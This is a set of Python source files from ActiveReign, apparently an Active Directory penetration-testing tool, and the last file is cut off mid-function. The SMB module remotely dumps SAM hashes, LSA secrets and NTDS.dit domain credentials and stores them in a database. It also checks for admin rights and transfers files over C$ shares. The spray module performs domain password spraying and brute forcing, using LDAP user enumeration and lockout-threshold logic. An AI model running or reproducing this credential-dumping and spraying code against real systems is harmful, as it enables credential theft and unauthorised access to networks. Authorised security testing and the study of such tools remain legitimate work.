from ar3.helpers.misc import validate_ntlm, get_filestamp
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join([choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = ''
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# @TODO refactor, called by spider & file search to create con
if self.smb_connection():
try:
self.login()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def login(self):
self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash)
self.auth = True
self.isAdmin()
self.updatedb_user()
def updatedb_user(self):
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain, self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
################################
#
# SMB Connection
#
################################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client, self.ip, sess_port=self.port, preferredDialect=SMB_DIALECT, timeout=int(self.timeout))
self.smbv1=True
self.con.setTimeout(self.timeout)
self.logger.debug('SMBv1: Connected to: {}'.format(self.ip))
return True
except Exception as e:
self.logger.debug('SMBv1: Error creating connection to {}: {}'.format(self.host, e))
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client, self.ip, sess_port=self.port, timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
self.logger.debug('SMBv3: Connected to: {}'.format(self.ip))
return True
except Exception as e:
self.logger.debug('SMBv3: Error creating connection to {}: {}'.format(self.ip, e))
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName() + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName() + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.con.login('', '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.getErrorString():
pass
self.srvdomain = self.con.getServerDomain() # Demo
self.host = self.get_hostname()
self.os = self.con.getServerOS() # Windows 10 Build 17134
self.signing = self.con.isSigningRequired() # True/False
if not self.srvdomain:
self.srvdomain = self.con.getServerName()
arch = self.get_os_arch()
if arch != 0:
self.os_arch = " x{}".format(str(arch))
if self.con.getServerDNSDomainName():
domain = self.con.getServerDNSDomainName()
else:
domain = self.ip
try:
# Log off before attempting new auth
self.logoff()
except:
pass
self.db.update_host(self.host, self.ip, domain, self.os, self.signing)
if self.args.gen_relay_list and not self.signing:
self.loggers['relay_list'].info(self.ip)
self.smb_connection()
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and (self.con.getServerName().lower() != self.con.getServerDNSDomainName().lower()):
return (self.con.getServerName() + "." + self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join([choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
try:
rpctransport = SMBTransport(self.host, self.port, r'\svcctl', smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host), 'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
except Exception as e:
print(e)
return False
################################
# Dump SAM / LSA
# Methods were modified from:
# https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
################################
def enable_remoteops(self):
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(self.host, str(e)))
def sam(self):
def add_sam_hash(sam_hash, host):
self.logger.success([self.host, self.ip, "SAM HASH", sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host, "{}:{}".format(lmhash, nthash))
add_sam_hash.added_to_db += 1
try:
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
add_sam_hash.added_to_db = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash(secret, self.host))
SAM.dump()
SAM.export(outfile)
except Exception as e:
self.logger.debug('SAM Extraction Failed for {}: {}'.format(self.host, str(e)))
if add_sam_hash.added_to_db > 0:
self.logger.success([self.host, self.ip, "SAM HASH", '{} hashes added to the database'.format(add_sam_hash.added_to_db)])
self.logger.info([self.host, self.ip, "SAM HASH", 'Output saved to: {}.sam'.format(outfile)])
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["SAM", "Error calling remote_ops.finish(): {}".format(e)])
SAM.finish()
def lsa(self):
def add_lsa_secret(secret):
for x in secret.splitlines():
self.logger.success([self.host, self.ip, "LSA SECRET", x])
add_lsa_secret.secrets += 1
try:
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
# Dump
add_lsa_secret.secrets = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SECURITYFileName = self.remote_ops.saveSECURITY()
LSA = LSASecrets(SECURITYFileName, self.bootkey, self.remote_ops, isRemote=True, perSecretCallback=lambda secretType, secret: add_lsa_secret(secret))
LSA.dumpCachedHashes()
LSA.exportCached(outfile)
LSA.dumpSecrets()
LSA.exportSecrets(outfile)
except Exception as e:
self.logger.debug('LSA Extraction Failed for {}: {}'.format(self.host, str(e)))
if add_lsa_secret.secrets > 0:
self.logger.info([self.host, self.ip, "LSA SECRET", 'Output saved to: {}.secrets'.format(outfile)])
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["LSA", "Error calling remote_ops.finish(): {}".format(e)])
LSA.finish()
def ntds(self):
def add_ntds_hash(ntds_hash):
if ntds_hash.find('$') == -1:
if "CLEARTEXT" in ntds_hash:
try:
username, password = ntds_hash.split(":CLEARTEXT:")
add_ntds_hash.clear_text += 1
domain, username = username.split("\\")
self.db.update_user(username, password, domain, '')
add_ntds_hash.added_to_db += 1
except:
self.logger.fail("Error adding clear text cred to db: {}".format(ntds_hash))
else:
if ntds_hash.find('\\') != -1:
domain, hash = ntds_hash.split('\\')
else:
domain = self.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(':')
parsed_hash = ':'.join((lmhash, nthash))
if validate_ntlm(parsed_hash):
add_ntds_hash.ntds_hashes += 1
self.db.update_user(username, '', domain, "{}:{}".format(lmhash,nthash))
add_ntds_hash.added_to_db += 1
except:
self.logger.debug("Skipping non-NTLM hash: {}".format(ntds_hash))
else:
self.logger.debug("Skipping computer account")
try:
self.enable_remoteops()
use_vss_method = self.args.use_vss
NTDSFileName = None
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.clear_text = 0
add_ntds_hash.added_to_db = 0
# Output File
file_name = '{}_{}'.format(self.host.lower(), get_filestamp())
outfile = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', self.args.workspace, file_name)
if self.remote_ops and self.bootkey:
if self.args.ntds is 'vss':
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
NTDS = NTDSHashes(NTDSFileName, self.bootkey, isRemote=True, history=False, noLMHash=True,
remoteOps=self.remote_ops, useVSSMethod=use_vss_method, justNTLM=False,
pwdLastSet=False, resumeSession=None, outputFileName=outfile,
justUser=None, printUserStatus=False,
perSecretCallback=lambda secretType, secret: add_ntds_hash(secret))
self.logger.info([self.host, self.ip, "NTDS", 'Extracting NTDS.dit, this could take a few minutes...'])
NTDS.dump()
self.logger.success([self.host, self.ip, "NTDS", '{} hashes and {} passwords collected'.format(add_ntds_hash.ntds_hashes, add_ntds_hash.clear_text)])
self.logger.success([self.host, self.ip, "NTDS", '{} creds added to the database'.format(add_ntds_hash.added_to_db)])
self.logger.info([self.host, self.ip, "NTDS", 'Hash files located at: {}'.format(outfile)])
else:
raise Exception("RemoteOps and BootKey not initiated")
except Exception as e:
self.logger.fail('NTDS Extraction Failed for {}: {}'.format(self.host, str(e)))
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(["NTDS", "Error calling remote_ops.finish(): {}".format(e)])
NTDS.finish()
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file, 'rb')
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', remote_share='C$'):
f = open(location, 'wb')
self.con.getFile(remote_share, remote_file, f.write)
f.close()
def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file.replace('\\','/')) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/smb.py | smb.py |
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
from ar3.logger import highlight
from ar3.core.connector import Connector
class WmiCon(Connector):
def __init__(self, args, loggers, ip, host):
Connector.__init__(self, args, loggers, ip)
self.display_ip = ip
self.display_host = host
self._debug = False
self.dcom = None
self.wmi_con = None
self.process_list = {}
def create_wmi_con(self, namespace='root\\cimv2'):
self.dcom = DCOMConnection(self.host, self.username, self.password, self.domain, self.lmhash, self.nthash)
iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
self.wmi_con = iWbemLevel1Login.NTLMLogin('\\\\{}\\{}'.format(self.host, namespace), NULL, NULL)
def get_netprocess(self, tasklist=False):
self.create_wmi_con()
wmi_enum_process = self.wmi_con.ExecQuery('SELECT * from Win32_Process', lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_process = wmi_enum_process.Next(0xffffffff, 1)[0]
wmi_process_owner = wmi_process.GetOwner()
attributes = {'computername': self.host,
'processname': wmi_process.Name,
'processid': wmi_process.ProcessId,
'user': wmi_process_owner.User,
'domain': wmi_process_owner.Domain}
# Dont wait until end to print
if tasklist:
self.logger.info([self.display_host, self.display_ip, "TASKLIST","PID: {:<6} Name: {:<20} User: {:<17} Host: {:<15} Domain: {}".
format(attributes['processid'], attributes['processname'], attributes['user'],
attributes['computername'], attributes['domain'])])
self.process_list[wmi_process.ProcessId] = attributes
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug( "Get-NetProcess: {}".format(str(e)))
else:
break
self.disconnect()
def get_netlocalgroups(self):
self.create_wmi_con('root\\cimv2')
query = 'Select Name from win32_group'
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for key,value in wmi_results.items():
self.logger.info([self.display_host, self.display_ip, "LOCAL GROUPS", value['value']])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug([self.display_host, self.display_ip, "LOCAL GROUPS", str(e)])
else:
break
self.disconnect()
def get_localgroup_members(self, domain, group):
self.create_wmi_con('root\\cimv2')
query = "SELECT PartComponent FROM Win32_GroupUser WHERE GroupComponent=\"Win32_Group.Domain='{}',Name='{}'\"".format(domain, group)
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for key,value in wmi_results.items():
member = self.parse_local_members(value['value'])
self.logger.info([self.display_host, self.display_ip, "LOCAL MEMBERS", "{:<30} {}".format(group.title(), member)])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug([self.display_host, self.display_ip, "LOCAL MEMBERS", str(e)])
else:
break
self.disconnect()
def parse_local_members(self, line):
# Parse domain\account_name from wmi output query
try:
data = line.split('.')[1]
domain, account = data.split(',')
return "{}\\{}".format(domain.split("=")[1].strip("\""), account.split("=")[1].strip("\""))
except:
return line
def wmi_query(self,namespace, query, name="WMI QUERY"):
self.create_wmi_con(namespace)
wmi_query = self.wmi_con.ExecQuery(query, lFlags=WBEM_FLAG_FORWARD_ONLY)
while True:
try:
wmi_results = wmi_query.Next(0xffffffff, 1)[0]
wmi_results = wmi_results.getProperties()
for k,v in wmi_results.items():
self.logger.info([self.display_host, self.display_ip, name, "{:<30} {}".format(k, v['value'])])
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug( "WMIQuery: {}".format(str(e)))
else:
break
self.disconnect()
def disconnect(self):
self.dcom.disconnect() | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/wmi.py | wmi.py |
QUERIES = { 'users_active' : '(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))',
'users_all' : '(&(objectCategory=person)(objectClass=user))',
'users_admin' : '(&(objectCategory=person)(objectClass=user)(admincount=1))',
'users_email_search' : '(&(objectClass=user)(mail={}))',
'users_account_search' : '(&(objectClass=user)(sAMAccountName={}))',
'cpu_all' : '(&(objectClass=Computer))',
'cpu_search' : '(&(objectClass=Computer)(dNSHostName={}*))',
'groups_all' : '(&(objectCategory=group))',
'group_members' : '(&(objectCategory=group)(sAMAccountName={}))',
'domain_policy' : '(objectClass=domain)',
'domain_trust' : '(objectClass=trustedDomain)',
'reversible_encryption' : '(&(objectClass=user)(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=128))',
'pass_never_expire' : '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))',
'pass_not_required' : '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))'
}
ATTRIBUTES = { 'users' : [ 'Name', 'userPrincipalName', 'sAMAccountName', 'mail', 'company', 'department', 'mobile',
'telephoneNumber', 'badPwdCount', 'userWorkstations', 'manager', 'memberOf', 'manager',
'whenCreated', 'whenChanged', 'Comment', 'Info', 'Description','userAccountControl'],
'cpu' : ['dNSHostName', 'operatingSystem', 'operatingSystemVersion', 'operatingSystemServicePack', 'Description'],
'groups': ['distinguishedName', 'cn', 'name', 'sAMAccountName', 'sAMAccountType', 'whenCreated', 'whenChanged', 'Description'],
'domain': [ 'cn', 'dc', 'distinguishedName', 'lockOutObservationWindow', 'lockoutDuration',
'lockoutThreshold', 'maxPwdAge', 'minPwdAge', 'minPwdLength', 'pwdProperties',
'pwdHistoryLength', 'nextRid', 'dn',],
'trust' : ['cn', 'flatName', 'name', 'objectClass', 'trustAttributes', 'trustDirection', 'trustPartner',
'trustType'],
}
UAC_LOOKUP = {
'1' : 'SCRIPT',
'2' : 'ACCOUNTDISABLE',
'8' : 'HOMEDIR_REQUIRED',
'16' : 'LOCKOUT',
'32' : 'PASSWD_NOTREQD',
'64' : 'PASSWD_CANT_CHANGE',
'128' : 'ENCRYPTED_TEXT_PWD_ALLOWED',
'256' : 'TEMP_DUPLICATE_ACCOUNT',
'512' : 'NORMAL_ACCOUNT',
'514' : 'Disabled Account',
'544' : 'Enabled, Password Not Required',
'546' : 'Disabled, Password Not Required',
'2048' : 'INTERDOMAIN_TRUST_ACCOUNT',
'4096' : 'WORKSTATION_TRUST_ACCOUNT',
'8192' : 'SERVER_TRUST_ACCOUNT',
'65536' : 'DONT_EXPIRE_PASSWORD',
'66048' : 'Enabled, Password Doesnt Expire',
'66050' : 'Disabled, Password Doesnt Expire',
'66082' : 'Disabled, Password Doesnt Expire, & Not Required',
'131072' : 'MNS_LOGON_ACCOUNT',
'262144' : 'SMARTCARD_REQUIRED',
'262656' : 'Enabled, Smartcard Required',
'262658' : 'Disabled, Smartcard Required',
'262690' : 'Disabled, Smartcard Required, Password Not Required',
'328194' : 'Disabled, Smartcard Required, Password Doesnt Expire',
'328226' : 'Disabled, Smartcard Required, Password Doesnt Expire, & Not Required',
'524288' : 'TRUSTED_FOR_DELEGATION',
'532480' : 'Domaincontroller',
'1048576' : 'NOT_DELEGATED',
'2097152' : 'USE_DES_KEY_ONLY',
'4194304' : 'DONT_REQ_PREAUTH',
'8388608' : 'PASSWORD_EXPIRED',
'16777216' : 'TRUSTED_TO_AUTH_FOR_DELEGATION',
'67108864' : 'PARTIAL_SECRETS_ACCOUNT'
} | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/ldap/query.py | query.py |
from impacket.ldap import ldap
from ar3.core.connector import Connector
from ar3.core.ldap.query import QUERIES, ATTRIBUTES
class LdapCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.ldaps = False
self.con = None
self.data = {}
self.set_baseDN()
self.db = db
##################################################
# Ldap Connection & Authentication
##################################################
def create_ldap_con(self):
if self.ldap_connection():
try:
self.con._socket.settimeout(self.timeout)
self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash)
self.db.update_user(self.username, self.password, self.domain, self.hash)
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to server failed')
def ldap_connection(self,):
if self.ldap_con():
return True
elif self.ldaps_con():
return True
return False
def ldap_con(self):
try:
self.con = ldap.LDAPConnection("ldap://{}".format(self.ip))
return True
except:
return False
def ldaps_con(self):
try:
self.con = ldap.LDAPConnection("ldaps://{}".format(self.ip))
self.ldaps = True
return True
except:
return False
##################################################
# Ldap Query Functions
##################################################
def set_baseDN(self):
self.baseDN = ''
# Set domain name for baseDN
try:
for x in self.domain.split('.'):
self.baseDN += 'dc={},'.format(x)
# Remove last ','
self.baseDN = self.baseDN[:-1]
except:
self.baseDN = 'dc={}'.format(self.domain)
def execute_query(self, searchFilter, attrs, parser):
sc = ldap.SimplePagedResultsControl(size=9999)
try:
self.con.search(searchBase=self.baseDN, searchFilter=searchFilter, attributes=attrs, searchControls=[sc], sizeLimit=0, timeLimit=50, perRecordCallback=parser)
except ldap.LDAPSearchError as e:
raise Exception("ldap_query error: {}".format(str(e)))
def ldap_query(self, search, attrs, parser):
self.data = {}
self.execute_query(search, attrs, parser)
return self.data
##################################################
# Ldap Search Types
##################################################
def user_query(self, query, attrs, all_users=False):
if attrs:
ATTRIBUTES['users'] = ATTRIBUTES['users'] + attrs
search = QUERIES['users_active']
if all_users:
# Query all users, even disabled
search = QUERIES['users_all']
elif '@' in query:
search = QUERIES['users_email_search'].format(query.lower())
elif query and query not in ['active', 'Active', '{active}']:
search = QUERIES['users_account_search'].format(query.lower())
return self.ldap_query(search, ATTRIBUTES['users'], self.generic_parser)
def computer_query(self, query, attrs):
if attrs:
ATTRIBUTES['cpu'] = ATTRIBUTES['cpu'] + attrs
if query and query != 'eol':
self.ldap_query(QUERIES['cpu_search'].format(query), ATTRIBUTES['cpu'], self.generic_parser)
else:
self.ldap_query(QUERIES['cpu_all'], ATTRIBUTES['cpu'], self.generic_parser)
if query == "eol":
self.data = self.eol_filter(self.data)
return self.data
def group_query(self, attrs):
if attrs:
ATTRIBUTES['groups'] = ATTRIBUTES['groups'] + attrs
return self.ldap_query(QUERIES['groups_all'], attrs, self.generic_parser)
def group_membership(self, group, attrs):
ATTRS = ['member']
if attrs:
ATTRS = ATTRS + attrs
return self.ldap_query(QUERIES['group_members'].format(group), ATTRS, self.group_membership_parser)
def domain_query(self, attrs):
if attrs:
ATTRIBUTES['domain'] = ATTRIBUTES['domain'] + attrs
return self.ldap_query(QUERIES['domain_policy'], ATTRIBUTES['domain'], self.generic_parser)
def trust_query(self, attrs):
if attrs:
ATTRIBUTES['trust'] = ATTRIBUTES['trust'] + attrs
return self.ldap_query(QUERIES['domain_trust'], ATTRIBUTES['trust'], self.generic_parser)
def custom_query(self, query, attrs):
if not query or not attrs:
raise Exception("Query / Attributes not provided for custom LDAP search")
return self.ldap_query(query, attrs, self.generic_parser)
##################################################
# LDAP Data Parsers
##################################################
def convert(self, attr, value):
try:
if attr in ['lockOutObservationWindow', 'lockoutDuration']:
# Min
tmp = (abs(float(value)) * .0000001) / 60
value = str(tmp) + " Min."
elif attr in ['maxPwdAge', 'minPwdAge']:
tmp = (abs(float(value)) * .0000001) / 86400
value = str(tmp) + " Days"
except Exception as e:
pass
return value
def generic_parser(self, resp):
tmp = {}
dtype = ''
resp_data = ''
try:
for attr in resp['attributes']:
dtype = str(attr['type'])
# catch formatting issues
if "SetOf:" in str(attr['vals']):
resp_data = str(attr['vals'][0])
else:
resp_data = str(attr['vals'])
resp_data = self.convert(dtype, resp_data)
tmp[dtype] = resp_data
self.categorize(tmp)
del (tmp)
except:
pass
def group_membership_parser(self, resp):
try:
for attr in resp['attributes']:
for member in attr['vals']:
cn = str(member).split(',')[0]
search = "(&({}))".format(cn)
self.execute_query(search, ATTRIBUTES['users'], self.generic_parser)
except:
pass
def no_parser(self, resp):
# Used for custom queries not tested with parsers
print(resp)
def eol_filter(self, resp):
# Parse results looking for end of life systems
data = {}
for k, v in resp.items():
try:
if str(v['operatingSystemVersion']).startswith(('3', '4', '5', '6.0')):
data[k] = v
except:
pass
return data
def categorize(self, tmp):
# Take temp data, sort and move to class object
for x in ['sAMAccountName', 'dNSHostName', 'cn', 'dc']:
try:
self.data[tmp[x]] = tmp
return
except:
pass
##################################################
# Ldap Close Connection
##################################################
def close(self):
try:
self.con.close()
self.con._socket = None
self.con = None
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/ldap/__init__.py | __init__.py |
from sys import argv
from ipparser import ipparser
from argparse import Namespace
from ar3.helpers.misc import file_exists
from ar3.core.ldap import LdapCon
def spray_args(sub_parser):
    """Register the 'spray' sub-command and all of its CLI options.

    Defines the argument surface for domain password spraying / brute
    forcing: spray method, user source, password source, domain scope,
    timing, and target selection (explicit targets or LDAP-discovered).

    Args:
        sub_parser: argparse sub-parsers action (the object returned by
            ``ArgumentParser.add_subparsers()``) to attach 'spray' to.
    """
    # Create Subparser
    spray_parser = sub_parser.add_parser("spray", help='- Domain password spray or brute force')

    # Output / Display Options
    spray_parser.add_argument('-t', dest='timeout', type=int, default=5,help='Wait time for recursive thread to find files in dir')

    # Method
    spray_parser.add_argument('-m', '--spray-method', dest="method", type=str, default='SMB', help="Spray Method {SMB, LDAP} (Default: SMB)")

    # User: exactly one of single user(s), user file, or LDAP extraction.
    # NOTE: -u and -U share dest='user'; -u appends, -U loads a file.
    u = spray_parser.add_argument_group("User Options")
    sp_user = u.add_mutually_exclusive_group(required=True)
    sp_user.add_argument('-u', dest='user', type=str, action='append', help='User to spray {account name, ldap}')
    sp_user.add_argument('-U', dest='user', default=False, type=lambda x: file_exists(sub_parser, x), help='User file to spray {Users.txt}')
    sp_user.add_argument('--domain-users', dest='domain_users', action='store_true', help='Extract users from LDAP (domain password spray)')

    # Password: single value(s), file, username-as-password, combo list, or hash.
    p = spray_parser.add_argument_group("Password Options")
    sp_pwd = p.add_mutually_exclusive_group()
    sp_pwd.add_argument('-p', dest='passwd', action='append', default=[], help='Single password')
    sp_pwd.add_argument('-P', dest='passwd', default='', type=lambda x: file_exists(sub_parser, x), help='Password file {pass.txt}')
    sp_pwd.add_argument('--user-as-pass', dest="user_as_pass", action='store_true', help="Set username as password")
    sp_pwd.add_argument('-C', '--combo-list', dest="combo", action='store_true', help="User:Pwd Combo list provided in user arg")
    sp_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')

    # Domain: either an explicit domain or local (host-only) authentication.
    spray_domain = spray_parser.add_mutually_exclusive_group(required=True)
    spray_domain.add_argument('-d', dest='domain', type=str, default='', help='Set domain')
    spray_domain.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')

    # Timing options
    spray_parser.add_argument('-j', dest='jitter', type=float, default=0, help='jitter (sec)')

    # ldap Authentication to collect users and/or targets
    ldap = spray_parser.add_argument_group("LDAP Options")
    ldap.add_argument('--force-all', dest="force_all", action='store_true', help="Spray all users, regardless of BadPwd count")
    ldap.add_argument('--threshold', dest='default_threshold', type=int, default=3, help='Set lockout threshold, if failed to acquire from domain (default: 3)')

    # Target: positional target spec or LDAP-driven discovery of all domain systems.
    target = spray_parser.add_argument_group("Target Options")
    targets = target.add_mutually_exclusive_group(required=True)
    targets.add_argument(dest='target', nargs='?', help='Positional argument, Accepts: target.txt, 127.0.0.0/24, ranges, 192.168.1.1')
    targets.add_argument('--ldap', dest='ldap', action='store_true', help='Use LDAP to target all domain systems')
    target.add_argument('--ldap-srv', dest='ldap_srv', type=str, default='', help='Define LDAP server (Optional)')
    target.add_argument('-id', dest='cred_id', type=int, help='Extract creds from DB for LDAP connection')
def spray_arg_mods(args, db_obj, loggers):
    """Validate and expand spray arguments before execution.

    - Caps max_threads at 5 unless the user explicitly passed -T.
    - Resolves the positional target (file / CIDR / range) via ipparser
      unless --ldap targeting was requested.
    - When --ldap or --domain-users is set, pulls a stored credential
      from the db (-id) and queries LDAP for users and/or computers.

    Returns the (modified) args namespace; exits on unrecoverable errors.
    """
    logger = loggers['console']
    # Spraying is lockout-sensitive: keep threads low unless the user
    # explicitly overrode -T on the command line.
    if '-T' not in argv:
        args.max_threads = 5
    # Allow null-password spray attempts when no password was given.
    if not args.passwd:
        args.passwd = ['']
    if args.method.lower() == 'ldap' and args.local_auth:
        logger.warning('Cannot use LDAP spray method with local authentication')
        exit(0)
    # Positional targets only need parsing when LDAP targeting is off.
    if not args.ldap:
        args.target = ipparser(args.target)
    if args.ldap or args.domain_users:
        if not args.cred_id:
            logger.warning("To use this feature, please choose a cred id from the database")
            logger.warning("Insert credentials:\r\n activereign db insert -u username -p Password123 -d domain.local")
            exit(0)
        # Extract creds from db for the LDAP query.
        ldap_user = db_obj.extract_user(args.cred_id)
        if not ldap_user:
            logger.fail("Unable to gather creds from db, try again")
            exit(0)
        context = Namespace(
            mode = args.mode,
            timeout = args.timeout,
            local_auth = False,
            debug = args.debug,
            user = ldap_user[0][0],
            passwd = ldap_user[0][1],
            hash = ldap_user[0][2],
            domain = ldap_user[0][3],
        )
        if context.hash:
            logger.status(['LDAP Authentication', '{}\{} (Password: None) (Hash: True)'.format(context.domain, context.user)])
        else:
            logger.status(['LDAP Authentication','{}\{} (Password: {}*******) (Hash: False)'.format(context.domain, context.user, context.passwd[:1])])
        try:
            # Define LDAP server to use for the query.
            l = LdapCon(context, loggers, args.ldap_srv, db_obj)
            l.create_ldap_con()
            if not l:
                logger.status_fail(['LDAP Connection', 'Unable to create LDAP connection'])
                exit(1)
            logger.status_success(['LDAP Connection','Connection established (server: {}) (LDAPS: {})'.format(l.host,l.ldaps)])
            ########################################
            # Get users via LDAP
            ########################################
            if args.domain_users:
                tmp_users = l.user_query('active', False)
                if args.force_all:
                    # Force spray on all users in domain - not recommended.
                    # list() is required: dict.keys() returns a view object
                    # with no .remove(), so without it the query user was
                    # never actually removed (the error was silently
                    # swallowed by a bare except).
                    args.user = list(tmp_users.keys())
                    try:
                        args.user.remove(context.user)
                        logger.status_success2("Removed User: {} (Query User)".format(context.user))
                    except ValueError:
                        # Query user not present in the LDAP result set.
                        pass
                    logger.status_success('{}/{} users collected'.format(len(args.user), len(tmp_users)))
                else:
                    users = []
                    # Check BadPwd limit vs. the domain lockout threshold.
                    try:
                        tmp = l.domain_query(False)
                        lockout_threshold = int(tmp[list(tmp.keys())[0]]['lockoutThreshold'])
                        logger.status_success("Domain lockout threshold detected: {}\t Logon_Server: {}".format(lockout_threshold, l.host))
                    except:
                        # Best effort: fall back to the user-supplied default.
                        logger.status_fail('Lockout threshold failed, using default threshold of {}'.format(args.default_threshold))
                        lockout_threshold = args.default_threshold
